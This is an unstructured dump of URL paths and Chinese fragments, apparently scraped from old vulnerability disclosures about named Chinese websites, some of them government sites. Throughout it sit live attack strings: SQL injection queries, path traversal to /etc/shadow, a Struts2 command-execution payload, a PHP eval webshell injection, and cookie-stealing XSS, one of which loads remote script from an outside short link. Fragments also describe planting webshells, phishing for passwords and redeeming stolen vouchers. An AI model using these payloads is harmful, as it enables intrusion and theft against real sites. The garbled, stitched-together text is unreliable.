/im5/login/login.action /upload/fxScanner.zip /default/detail/index?files_id=6317 /Index/zhshow2?id=18 /Index/zhshow2?id=18 /admin/do.php www.25union.com只是开设的一个非法小联盟,里面全是色情网站,利用这些网站群 /m_second.php?id=41 /index.html登录界面点击忘记密码,输入真实的邮箱。 /onlineproblem.html /cgi-bin/oauth2/authorize?client_id=801166744&redirect_uri=http://www.wooyun.org&response_type=code /?code=0d3c9101440f53fbd12c791841ea6***&openid=8487834F089CE2145F4E47C76F2C6***&openkey=3C761BB9238101E1AABBD83C09037*** /login.action /checkLogin.action /login.action /checkLogin.action /submit/activate.php?user=XXXXXFxLmNvbQ==&code=MTM1MTczOTkwNg== /submit/resetpass.php?user=XXXXXFxLmNvbQ==&pass=MTM1MTc0MTY4OA== /actdo.php?action=sms&do=sendcontact&corpid=245&whitehatid=xxx /story-2800-p-1.html /story_detail.php?id=2800%20and%203=8%20union%20select%201,2,3,`schema_name`,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20(select%20`schema_name`%20from%20`information_schema`.`schemata`%20limit%2012,1)%20t%20-- /news_detail.php?id=37056 /magazine_list.php?id=375 /magazine.php?id=2590 /famous_magazine_detail.php?id=364 /columns/columns_detail.php?id=2489 /video.php?id=133 /mw/login /mw/login /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml / / /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /images/common/uploadpic/20/13515781202937.jpg/1.phpssasssss weibo.cn/?gsid=3_5xxxx,这就使得只要该页面存在外链(即使通过301/302跳转),外链的目标服务器就可以从Referer得到gsid。 /xxxxx的跳转,此时跳转后的页面如下图(中)所示。用户点击“手机版”后会跳转到目标服务器,从而留下Referer /wiki/Samy_(XSS) / / /user/message_mgr.do?m=init /witkey alert() /21719892 /login bbsadmin /hr/admin/login.php /search/song?key=;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C /search/album?key=;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C www.xiami.com/web/下,是WAP站点,登陆后个人签名处、评论处,意见反馈处均存在存储型跨站,意见反馈处随意盲打后台。 / www.tpstar.net /login.do stylesheet xsl="http://www.w3.org/1999/XSL/Transform template template stylesheet /member/findPass.do 
www.53kf.com开放端口10003(10003/tcp /fanyi/add#2 /zhidao/pic/item/xxxxxxxxx.jpg /url/test.js /url/test.js /app/enter?appid=280383 /v2/api/?getapi&class=login&tpl=lo /v2/api/?getapi&class=login&tpl=lo http://www.tyzq.com.cn/pages/2news/news_show.action?category=zqscxgyw&guid={6EA7CEEF-89F7-4C57-BB41-EE0E47A70E94 /AboutUs/NewsLook.php?id=21 /xService/Index.php?id=7 /AboutUs/NewsListByType.php?tid=1 /Other/ClientList.php?tid=1 /main/down.jsp页面对filePath参数没有任何过滤导致任意文件下载漏洞 /main/down.jsp?filePath=/../../../../../../../../../../../../../../../etc/shadow&fileName=1.txt 591wed.com /miao/ready.php?id=62 /Tuangou/index.php?id=91 /Tuangou/index.php?id=91 /Tuangou/index.php?id=91 /company_price.php?companyID=1451&id=11917 /company_price.php?companyID=1451&id=11917 /company_price.php?companyID=1451&id=11917 /discount/bridal_veil_cont.php?id=8 /discount/bridal_veil_cont.php?id=8 /discount/bridal_veil_cont.php?id=8 /bbs_activity/sh_100902_2.php?act=v&id=22 /bbs_activity/sh_100902_2.php?act=v&id=22 /bbs_activity/sh_100902_2.php?act=v&id=22 /type_14.html /1.txt /phpmyadmin/ /xampp/phpinfo.php discovery.baidu.com/down_bizi2.php?thumb=/program.php /WebAdmin/NewsDetail.php?ID_News=4468 /WebAdmin/NewsDetail.php?ID_News=4468 /WebAdmin /Service/OrderToolBarService.aspx?callback=jsonp1351970015502&_=1351970046200&action=CancelOrder&orderid=366350744&Key=E8A9EC9F490C2AF1C2F159D74CF9904D /programs/view/zfkZlYZByHI/ /i/control/order-cancelled?orderId=1351971788631 /ysmp_08xuyu/message_ajax.php /zhaoqing/bbs/ / 0898.net分域名都有SQL漏洞。 /cgi-bin/user/bbs_show_my_msg?search_class=4&Ptype=a&uin=149245802&search_value=d%25%22%20and%20version()%3E4%23 /cgi-bin/user/bbs_show_my_msg?search_class=4&Ptype=a&uin=149245802&search_value=d%25%22%20and%20version()%3E3%23 /online/getunreadnum.php?func=callback /online/getunreadnum.php?func=callback /index.html /uploadServer/jsp/debug.jsp /wdfportalCache/debug.jsp /wdfportalCache/ora.jsp 
/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=friends%27%20and%20%271%27=%271 www.siteserver.com没有 /oauth/access_token /index.php?id=xAuth%E6%96%87%E6%A1%A3 /oauth/access_token /articles/web/5984.html找到的相关向量 /myspace/test /index.php?m=festival&type=451'&cityid=29 /MemberTrade/cancelOrder?orderSn=121105411598&cancel_reason=%E6%94%AF%E4%BB%98%E4%B8%8D%E6%88%90%E5%8A%9F /uploadServer/index.do /wap/?a=header&from=&h=5&t=x&mcid=10 /wap/?m=Soft&t=x&mid=103&stid=13 /index.php?c=android&a=android_info&act=m&pname=1401 /admin/index.php/Public/login /m/fckeditor/editor/fckeditor.html /?c=android&act=--%3E%27%22%3E%3Cscript%3Ealert%28/seay/%29%3C/script%3E gmail.com/6052077@qq.com / 82**17/stone**shi/ /wap/?a=header&from=&h=5&t=x&mcid=10 10.147.% /index.php?c=android&a=android_info&act=m&pname=1401 10.147.19.237 /fcgi-bin/webinvite?cmd=get_group&appid=10001&callback=qq_friends /fcgi-bin/webinvite?cmd=get_group&appid=10001&callback=qq_friends /tv/center/orderForward.jsp?orderId=1959130&updateOrder=2 /j/app/login /jcc/outside/noLoginAction.do?action=elisorPublicList&queryOrgId=-1 /jcc/outside/noLoginAction.do?action=mediatePublicList&queryOrgId=-1 /loadxml.asmx可读任意xml。 /loginAction!initChange.action /showFeedback /showFeedback?suid=1210151115372890 /prog/wapsite/sso/login_submit.php url(#default#AnchorClick) alert(1) /editor/filemanager/upload/test.html /ft/product.fb,我这里只测试了网易云阅读: /index.php?id=15881%A1%AF&from_id=40951没有做任何sql过滤导致sql注入漏洞,电商的安全性应该要求更高些吧。 /tv/center/orderForward.jsp?orderId=1959130&updateOrder=2 /onlineusers/0/ /getOnlineNum www.tongrentangtcm.com /leifeng/admin/ /leifeng/admin/content_list.jsp?title_id=117 /grouppic/2012/11/07/1352275320Prqpi_big.jpg /grouppic/2012/11/07/1352275320Prqpi.jpg /cgi-bin/local/news.cgi?cat=480 /admin/default.aspx /x.js seo.chinaz.com/?host=unbet8.com%2f% /meta/#url=unbet8.com/0.htm /meta/ret/01370d996e987723/ /Tools/MetaCheck.aspx?url=unbet8.com%2F% / 
/admin/ /webim/vote_pc.php /index.do /swordcms/platform/components/fckeditor/editor/plugins/upload/upload.jsp即可直接上传jsp木马,获取的jsp木马路径为:http://www.hbcss.gov.cn/swordcms/uploadfiles/root.jsp。因为是jsp架构故webshell权限多为system或者root权限,可成功拿下系统权限。 /user_info.php?action=my_order&do=order_amount_current_month¤t_mon=03&random=0.7064526792839925×tamp=1352368141820¤t_year=2012 / / / /login.php?action=submit /login.php?action=submit /index.php?c=default&a=content&p=1&ic_id=76&id=161 ypk.xywy.com admin /38jie.php /Display.aspx?Type=notice&ID=163 /plus/hdview.php?aid=52216 /wzsp/login.aspx(可绕过,但不是admin权限) /wzsp/ /ued/ / /member/forgetpwd /forgotpassword.jhtml /login/login.aspx?http://www.vjia.com/ / /login/login.aspx?https://www.vjia.com/ /PublicControls/NewValidateCode.aspx?height=25&width=93&codeLen=0&photoType=0&t={时间戳,可忽略 regForm.submit() /partner_renrenOauthCallback_wintype_?code=nOxfokUeUu42WuKlYz1hJOT4xWPimrad /qxjweb/zxft/qw.jsp?id=36156 /cqds/ /assetmanager/startPage.jsp /assetmanager/startPage.jsp /zfxxgk/ /ckfinder/ckfinder.html /fcgi-bin/webpet?cmd=query&flag=0&callback=getmeizi /cgi-bin/v1.0/extern/cgi_official_website.cgi /cgi-bin/qqgame_get_relation?type=1&callback=getmeizi /eduDedicatedDomainName.do / /chs/index.html这个页面 /index.php?m=order&act=view&orderid=4645663 /checkvalidcode / /Login.aspx /login.aspx /iframe_brief.php?style_id=103560295 www.jiayuan.com /login/validate.php /User/RetrieveStep1 /contact/contactfillinverifycode.aspx?method=GetPwdByPhone&code=53750b5150827ddebc7b05c558e48905&cellphonenum=1*********9&no=7144 /app/web/include/include.tar.gz /app/web/config.php.1 www.yytingting.com出品的Android有声读物软件“懒人听书”,在自动更新时没有数字签名,也没有任何认证,如果被arp欺骗,或者DNS劫持等,可被利用来替换成其他apk,最终可能达到远程代码执行的后果。 /index.php /n_wlan/admin/login.php?action=login /xueyebing/jixingbaixuebing/ /cardmg/,post型sql注入。注入的话可以获取到兑换卷的号码和密码信息。直接在这个上面填写卷号和密码即可兑换大闸蟹,其中发现兑换券大部分未使用,金额大概在万元左右。涉及到资金问题,认为还是比较严重的问题了。 
/main/usermessage?id=0&htmlmark=2&delmark=1,可以免admin登录查看通话记录,查询,下载,删除通话录音文件。不少政府机关,学校,公司很多都采用SOC1800用于电话录音,危害不小。 /试了试找回密码的功能,瞎狗眼啊瞎狗眼!!!!! /index.html?email=imlonghao@gmail.com&showWindowFlag=1 /,找到【登录】按钮进入登录页面,看到灰色的【忘记密码?】链接没有,点它: /assetmanager/HTMLEditor/insertflash.jsp直接上传jspshell /vc/ /common/modules/survey/survey_submit.php?s_id=27750 /2pdf/down.aspx?fn=/down/2012/11/xx/xx/xxx.pdf /2pdf/down.aspx?fn=down.aspx /2pdf/down.aspx?fn=../web.config /2pdf/down.aspx?fn=upload.aspx /2pdf/down.aspx?fn=upload.aspx.cs /2pdf/down.aspx?fn=down.aspx.cs /2pdf/down.aspx?fn=../ToPDF.aspx /2pdf/down.aspx?fn=../ToPDF.aspx.cs /",function /。 /jifen。积分栏目排行榜可以看到用户完整的邮箱,基本可以根据前面提示的用户名前三位猜测到密码,进而通过密码修改漏洞,进而获取用户信息,修改资料,提取用户积分为人民币,通过前几位的排行榜可以看到,至少可以获利10万以上。 /uc_v1.php?id=7 /bj/reghouse.php /cms/ /api/getreplay.php?order=1&page=1&sport_type=0&type=getallyuezhan&week=0&_=1352445400451&city=11 /login_login.action /getProductDetail.action?software_id=08ef5507-d870-45f3-92f3-b4cab5ec2f7d /main.php?do=user_change_email&flag=edit /main.php?do=user_activate_ajax&flag=email&email=攻击者的邮箱&mark=1&type=1 /bug.php?action=view&id=6052 /usercp/article_edit.php /user/resetpassword.php?user=********&email=**********%40163.com&salt=eb5f16&u=&c= /leagueimg/092.gif/.php /zcfg_detail.php?id=345 /jact/front/front_main.action /zjlawyermanager/view/home/Home/index/index.do zc.qq.com/chs/index.html /api/info/infolisttemplate/bj/hezu/0/50?pic=1 http://api.wap.58.com/api/info/infoview/bj/isall/AADD95C12189A537CC07A74ECFAD8B5F/?pic=1 /api/user/deleteinfo/?userid=3130393236333139383139303134&infoids=83C0A6A1F3506173E3D628DC6BA6CEC7 /app/blog/detail/4206?mid=41632 /usr/local/java/jre/lib/i386:/usr/local/java/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib / /ptebook/book.php?bookcode=1452 /weiboshare/?id=180183 /news_details.asp /newslist.php?cid=22 /fckeditor/editor/filemanager/connectors/uploadtest.html /fckeditor/editor/filemanager/connectors/test.html /index.php/user/lookpass 
/RegfindPassword.action?email=邮箱&loginName=用户名 /search/search.ydd?keyword=%3CScRipt%3Ealert%28%22xss%22%29%3C%2FScRipt%3E&t=blog /user/space/alltalk/?type=s /shop/hrexchange/room/1120199/?cid=1004_786251 /ajax/resume/show/?view=0&id=AAAAAAA&r=BBBBB /main/phonereg.jsp /showcontent.php?type=news&did=1305 /showcontent.php?type=news&did=1305 /showcontent.php?type=news&did=1305 SQL注入,是程序员都应该知道。。这我就不描述了。 20px;float:none;width:40px /index.php/crowdtest/file/showImage/fileid/103323 expression(alert('test')) /index.php/crowdtest/post/showPost/postId/2128/pageNum/0 /website/mu04.jsp?uid=754 /upload/default/20121115/upload_122408.php /index1.php?id=34 /login.php一个投票系统,居然还存在访问控制绕过。。好吧~啥都不说了~ alert(0);void(0) /maldives/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /reviews.jsp?movId=145176 /editor/filemanager/upload/asp/upload.asp即可上传任意文件。这个是很早以前的fckeditor /cgi-bin/content_new?tid=13315465628034261&num=10&order=0&fid=674.js alert(window.name) /q2VPC 274px;background-color:#abaca7 274px;background-color:#e7effc;border:5px 15px;width:315px /save.php /google.png 5px / /lvword/ApplyDel.asp?user=100eGuest&Delete=1 /1.js jQuery.getScript(String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,106,115)) /sjtxxgk/fhome.action /scjs/adsearch.action t.qq.com/messages/inbox#pmtid= /wap/data/admin/ver.txt /wap/back/data/admin/ver.txt /memberManager.action /Service/ContactService.ashx?Method=EmailGetPwdResetPwd /Service/ContactService.ashx?Method=EmailGetPwdResetPwd /info/Arcitle_Show_Ac_world.asp?BigClassName=%B4%F3%C7%A7%CA%C0%BD%E7&BigClassID=1+and+1=1 /preuid.php?uid=2610023800 /interface/question_elite.php?sub=318&sub_pid=315 /peerpaycore/confirmPeerPayResult.htm?applyId=20121116146677759#)中的applyId可以遍历到当天的信息。 /apps/blog/index.php?s=/Index/addBlog /SUSF/sy!query /?ch=warm.invite.url&fuin=10005 /feedback.html /zaePDI?1353141891 /whitehats/%E8%93%9D%E9%A3%8E /poigame 
/AigoWebsite/news/show.asp?nid=159 /new_geyao_new.aspx?id=24 /admin/ /data/data.mdb /admin/ /gzwnrgl/nrglIndex.action?catalogID=11&type=3 /investigate/communion.action?communionType=1 /ebook/search.jhtml?sw= /manage/left.asp /manage/articleguanli/grhymm.asp /Index/zhshow2?id=13 /zone/"+uid+"/editUserInfo.action /admin和http://119.254.xx.xx/admin,头一个网站泄露了数据名。 /admin/ /upload/ www.250y.com存在S2漏洞,root权限。 /tags.php?/%D0%D0%D2%B5%D7%CA%D1%B6 /tags.php?tag=/%D0%D0%D2%B5%D7%CA%D1%B6 /tags.php?tag=/%D0%D0%D2%B5%D7%CA%D1%B6 /v2/iframe/safe/email/active.shtml?pkey=undefined&email=13045558888@qq.com none alert(document.cookie) /display.action /cms/sql/cms_login.sql /phpclient/cms/login.php /admin.php /special/20100719085540/admin/index.php /special/20100719085540/admin/index.php?todo=articleForm&act=articleEdit&id=68 /epanelweb/client/donatehistory/donatPoint.htm?random=121212&point=-1000&donateId=1168 /campus/video?vid=42&userid=7322865 /campus/video?vid=42&userid=7322865-version() /campus/video?vid=42&userid=7322865-versionn() /rsgzgl_site/login.asp /.bash_history http://www.sudu.cn/domain/templete.php?action=modify&cid=461194 integer Mysql /mianshi//info/content.php?menu_id=3&interview_id=7245 /mianshi//info/content.php?menu_id=3&interview_id=7245%20and%201=2%20union%20select%201,admin_type,3,4,5,6,7,8,9,10,11%20FROM%20met_admin_table%20limit%201,1 / /editpost.aspx?topicid=9195391&postid=11807724 /info/fileinfo.aspx?fileID=6659924 16.0 /info/fileinfo.aspx?fileID=6659924 /extmail/cgi/index.cgi /extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi //extman/cgi/signup.cgi?domain=%3Cscript%3Ealert%28document.cookie%29%3C/script%3 //extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi /index.html /flash_upload.php?modelid=-1 /rkit /300215/3881309/ /page/html/?1.html /chinamobile/db/payment.sql /inc/onclickadd.asp?idname=教育频道 /forum.php /v/search/123 / /v/getchat 
/v/chat,可见即可,在访问http://wan.360.cn/v/getchat /data/misc/wifi /admin/left.aspx /Admin/sqlPlatform/operateSql.aspx /Admin/sqlPlatform/sqlLogin.aspx /index.php?m=Public&a=login //sso.boyaa.com/从而暴露各种后台。 /phpmyadmin/index.php还有个这个。 /#!app=100626394 /#!app=100626394%22%3E&url=http%3A%2F%2Fappstore.qzone.qq.com%2Fcgi-bin%2Fqzapps%2Fqz_appstore_app_lite_v3.cgi%3Fappid%3D100626394%26uin%3D114967639%26pfid%3D2%26qz_ver%3D6%26appcanvas%3D0%26qz_style%3Dv6%2F31%26params%3D%26canvastype%3D%26via%3DQZ.HashRefresh /#!app=100626394 /cgi-bin/qzapps/qz_appstore_app_lite_v3.cgi?appid=100626394&uin=114967639&pfid=2&qz_ver=6&appcanvas=0&qz_style=v6/31¶ms=&canvastype=&via=QZ.HashRefresh alert(1) /ndvs/auto_login.asp?user=user&PWD=3E30A217E9E1C596D2C8FF53788DB915&nettype=0 biz.go.cn/index.php/biz/down?gid=813 biz.go.cn/index.php/biz/down?gid=1333 /login/Jeecms.do /web.rar /queryNoticetoindex.action /taobaomanage/ /initPage.do?method=initPage / /left.PHP /top.php /business/ /business/table.php /huodongye.php?pn=zucefangsi /wap/hotel/query.shtml /manage/ /gv /gv 100% 100%;z-index:10;position:absolute 0px 0px /xss-test/renren/test.js /gv /cn2/findpsw/mobile_web_find_input_account / /Admin/ cs:122 /Npcs.aspx?cid=&lid=&tid=&minlevel=&maxlevel=&zid=&aid=&name=1(sqlinjection /manager/login.aspx /admin.php /admin/login.aspx /comment2/admin/login.htm / /Login.aspx 83” /admin/login.aspx /home.action /web?query=inurl%3A%3Cscript%3E&_asf=www.sogou.com&_ast=1353643719&w=01019900&p=40040100&sut=2354&sst0=1353643719001 /fh/ks_list.aspx?ks=%C4%D0%BF%C6&ty=anli /login.aspx / /admin/privilege.php?act=login alert(document.cookie) /ZJ_XLY_KJWebApp/JJ_Index.aspx /group/posts/38/members/index.php?wd=123'%20and%20 /test2_gm_server/WEB-INF/classes/conf/db1/test2_db.xml /test2_gm_server/WEB-INF/classes/conf/db_gm/gm_db.xml /phpinfo.php /test.php /test.html /account/address / /fbrole/main/loginframe/login_cert.jsp /1.txt /main.php?do=tourist_template_edit&id=987682&i=1&edit_type=1 
/main.php?do=tourist_template_ajax&flag=delete&id=987682 /main.php?do=pay_user_template_edit&id=155745&i=1&edit_type=1 /main.php?do=pay_use_template_ajax&flag=delete&id=155745 /developer/cn/newsshow.php?id=507 /gex/loginAction_gotoLogin.action /blog/admin/ house365.com txt|doc|xls /1190902/blog /1190902/gbook /1190902/photo /q/roofsec /index/vote/268 gov.cn mail /xlyshsystem/login.aspx admin:123456 / /ajaxuser.php?type=blog&action=atcblogclass&job=add /my/feeds /zfcg/show.aspx?rid=20120615171517 /system_dntb/upload/temp.asp /authtest.php?id=Ayuk1y&info=Please+Login+In++@360.cn desFolder=server.mappath("../pic") www.eastday.com /admin /images/website/logo.gif /PicNews.aspx?id=30 / /Finger /Finger /Finger /Finger /user/contactShowModify.jspx?memberId=8679 /chezhan/chengdushi/chengdushi13994.html www.chinawest.gov.cn shop/member!passwordRecover.action / /zt.php?tid=390 /cms/getclick.do存在struts2漏洞 /login/login.php?module=login&opt=login&subopt=begin /WWaterV020/WWater/WWater.WebUI.RMC/Video/HCNetVideoIndex.aspx /WWaterV020/WWater/WWater.WebUI.RMC/Video/CodeBase/setup.rar /WWaterV020/WWater/WWater.WebUI.RMC/Video/CodeBase/%e8%a7%86%e9%a2%91%e7%9b%91%e6%8e%a7.rar /ajax/message/send.php /index.php?type=jbsz&op=password,为修改自己的账号密码。 http://my.zol.com/ajax/personal/password.php?type=jbsz&op=password&action=modify&password_old=sdfgadfgas&password_new=nihaoa&password_new2=nihaoa&15:3:53:102&15:3:53:138 /index.shtml /mbloghead/7d0a4feda705e41130f6/120 /Finger www.china-cdt.com www.china-cdt.com / oeeee.com /fh/nk_list.aspx?id=%C4%D0%BF%C6&type=remen /fh/nk_list.aspx?id=%C4%D0%BF%C6&type=remen /fh/nk_list.aspx?id=%C4%D0%BF%C6&type=remen /fh/ks_detail.aspx?id=7367 /fh/ks_detail.aspx?id=7367 /fh/ks_detail.aspx?id=7367 
/dsmmp/showList.action?struts&(a)(('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(z))&(b)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(z))&(c)(('\u0023_memberAccess.excludeProperties\u003d{}')(z))&(d)(('\u0023a_cmd\u003d\'\143\141\164\40\57\145\164\143\57\160\141\163\163\167\144\'')(z))&(e)(('\u0023a_array\u003dnew\40java.lang.String[3]')(z))&(f)(('\u0023a_array[0]\u003d\'/bin/bash\'')(z))&(g)(('\u0023a_array[1]\u003d\'-c\'')(z))&(h)(('\u0023a_array[2]\u003d\u0023a_cmd')(z))&(i) /Project/ViewCode/pid/xxx pwd user txt www.ibevision.com oeeee.com /index.php?m=Vote&a=content&uid=1011&id=156 /tuijian/viewnew.aspx?id=230 /tuijian/view.aspx?id=82 /wenmessage/ListWenMessage.aspx?type=%C8%C4%B8%BB%CD%A8 /tuijian/view.aspx?id=82 /tuijian/view.aspx?id=82 /Api/channel.php?s=/index/search/?s=/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D wenzhou.house.sina.com.cn/ht/,由于是手机党,我这没办法截图,附上网页文字看看吧 history.go(-1) /index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /portal/common/index_board_detail.do?boardId=281 /news/detail/index.php?id=-1 /apps/actwrite/index.php/Index/content/id/640698 /apps/actwrite/index.php/Index/content/id/640698 /console/ /de/member/reg_new.php / / / / / /show.php?cid=7&id=115 /admin/admin_main.php /InvoiceQuery/login.action /login.html /feedback.php /suggest/ function(){var 9149F99D-BC22-49c9-B952-845C94707595 /ZingPlayWA.cab#version=1,0,0,8 function(){if function(){},init function() function() false;if /?/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C /account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg /account/register/user_name-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg /index.php?r=detail&id=24009 /core/login /.svn/entries /viewEnterprise!main.action?id=52 / /admin/.svn/entries /coopinter/trunck/web/admin /coopinter 
/admin/.svn/text-base/addadmin.jsp.svn-base /article/search.php?ver=iphone&tag=%E6%90%AD%E9%85%8D /tryapply/?tryid= /products/show/33880?score[27]=&score[20]=&score[7]=&score[35]=&pf_ycall=&ptypecode=010402&pid=33880&bid=549&issubprice=0&csid= /products/show/36104?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=36104&bid=707&issubprice=0&csid= /article/search.php?ver=iphone&tag= /products/show/32817?score[50]=&score[51]=&score[52]=&score[7]=&score[1]=&pf_ycall=&ptypecode=010602&pid=32817&bid=718&issubprice=0&csid= /products/show/37269?score[2]=&score[6]=&score[5]=&score[4]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010107&pid=37269&bid=671&issubprice=0&csid= /products/show/9155?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=9155&bid=694&issubprice=0&csid= /products/show/33629?score[38]=&score[36]=&score[37]=&score[7]=&pf_ycall=&ptypecode=010120&pid=33629&bid=788&issubprice=0&csid= /products/show/34713?score[6]=&score[4]=&score[2]=&score[5]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010108&pid=34713&bid=1216&issubprice=0&csid= /products/show/31930?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=31930&bid=836&issubprice=0&csid= /products/show/34968?score[4]=&score[5]=&score[6]=&score[2]=&score[3]=&score[1]=&score[7]=&pf_ycall=&ptypecode=010115&pid=34968&bid=1216&issubprice=0&csid= /products/show/34995?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=34995&bid=487&issubprice=0&csid= /products/show/33212?score[38]=&score[51]=&score[15]=&score[14]=&score[7]=&pf_ycall=&ptypecode=010118&pid=33212&bid=612&issubprice=0&csid= /products/show/34363?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=34363&bid=597&issubprice=0&csid= 
/products/show/33527?score[19]=&score[5]=&score[27]=&score[7]=&score[11]=&score[28]=&pf_ycall=&ptypecode=010503&pid=33527&bid=489&issubprice=0&csid= /products/show/33828?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=33828&bid=691&issubprice=0&csid= /products/show/14787?score[39]=&score[4]=&score[6]=&score[1]=&score[40]=&score[7]=&pf_ycall=&ptypecode=010112&pid=14787&bid=811&issubprice=0&csid= /tryapply/?tryid= /hs6/index.jsp /hs6/jsp/transcript.jsp?color=000000&docid=249612 /hs6/ /article/2012/82657.html www.nmggtt.gov.cn /nmgt/cms/web/file_upload.jsp?type=file&fieldname=attachment&viewext=true&table=p_web&category=xf&info=20121201233421806245646 www.nmggtt.gov.cn:83 /zcfg_show.asp?ArticleID=1273 /?url=xxxx&title=xxx&du=&pic=&vid=&tag=&uid=XXX&acl=&su=XXXX{%Inject /ns.asp?nowmenuid=500290&pageno=1&previd=500292&key=%22%3E%3Cscript%3Ealert%2891%29%3C%2Fscript%3E /shop.asp?key=1234%22%3E%3Cscript+%3Ealert%28796%29%3C%2Fscript%3E&previd=500017&nowmenuid=500010&Submit2=%CB%D1%CB%F7 /shop_cart.asp?cc=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&prodid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&nowmenuid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E /shop_order.asp?orderid=500828%27%2Balert%28827%29%2B%27&nowmenuid=500010&tm=500010205251500828 /Login.aspx?returnUrl=/index.aspx /wenda/?/admin/setting/sys_save_ajax/ /wenda/?/admin/setting/type-content /anotice/indexTop.action / /eduwebproduct/ /139/callback.do?clickSysId=13&userAccount=9f317ed76ab54343445074489571662b&rType=0&rUrl=https%3A%2F%2Fpassport.yihaodian.com%2F139%2Fcallback.do&mKey=DF37443453h45F3CDCF0FC6A413EB6DF×tamp=407799950&usertoken=OLPTOKENbfGGGHH61340e1ad0cdd85a99ddfc05 /plus/showgirl/en/index.php?m=Index&a=index&sgid=614 
/new/netease/callback.aspx?username=8202378786&ts=20121202205444&sign=4ED3AE3FF504043411743F1A702FC649495CE94CE8078DBACA2D056A21BBE49F5205CEC5DBF08AD089A92FBBE6D7001DF9DAF0FC6ECE9A5A3FC9294CD586A87D9B453D4154AF19F5E2319C115AF8FA487A3D6055AB1351A6184D219931A8B1CE /index.action / / /jmx-console/ /api/mailer.php?action=lar /api/mailer.php?action=sme /php.php /servicesurvey/login.php /qun.php?pos=411&k=\x22\x3E\x3cimg\x2fsrc\x3d1\x20onerror\x3d\x22alert(1)\x22 /qun.php?pos=411&k=\x22\x3E\x3csvg/onload\x3dUI.getScript(\x22//url.cn/7Hdsis\x22) /asyn/getSearchHistory.php获取返回数据之后,会调用 /agent!login.action /485 fixed break-all www.nxgtt.gov.cn /ejforum/index.jsp www.oschina.net的,就输入了该网站的用户名和密码,点击确定以后其实这个密码就发给我了,因为这个钓鱼认证是我搞的,好了看看效果把。 /invoicing/netpage/qiantai/ndetail-2.action /index.action /online/register/registerQuery!queryEmail.ajax system_r:unconfined_t:SystemLow-SystemHigh /InfoShow.asp?kid=2291 /member/login.asp /html/db/portal.action /web!listBusiness.action /?url=http%3A%2F%2Fwww.gzpfyy.org%2F&vt=a&linktext= /s?wd=inurl%3A%2FReadNews.asp%3F&pn=10&ie=utf-8&rsv_page=1 / /addjob/index.php?n=%E5%BB%BA%E7%AD%91%E8%BF%90%E8%A1%8C%E7%BB%B4%E6%8A%A4%E7%AE%A1%E7%90%86%3Cscript%3Ealert%28/xss/%29%3C/script%3E /ogilvy_sys/login.php /profile/ /Community72/13/13/20637355-share-1_x.jpg /点击应用 /tianya_sdk_php/oauth_normal.php /oauth/request_token.php取得request /oauth/authorize.php?oauth_token=XXXX&consumer_key=[APP /oauth/authorize.php?consumer_key=XXXX /oauth/access_token.php /member/login.jhtml /json/show_buyer_list.htm?is_offline=&page_size=15&is_start=false&item_type=b&ends=1352176000000&starts=1351571000000&item_id=19417712520&&user_tag=38866976&old_quantity=56564&sold_total_num=null&closed=false&seller_num_id=(替换你帐号的userid=后的数字)&zhichong=true&taohua=&sbn=&bidPage=1 /share/link?shareid=134784&uk=3173747426 /app点击应用 /t163_php_sdk/index_normal.php /oauth/request_token取得request /oauth/authenticate?oauth_token=XXXXXXX&oauth_callback=XXXXXXX /oauth/authenticate /oauth/access_token / 
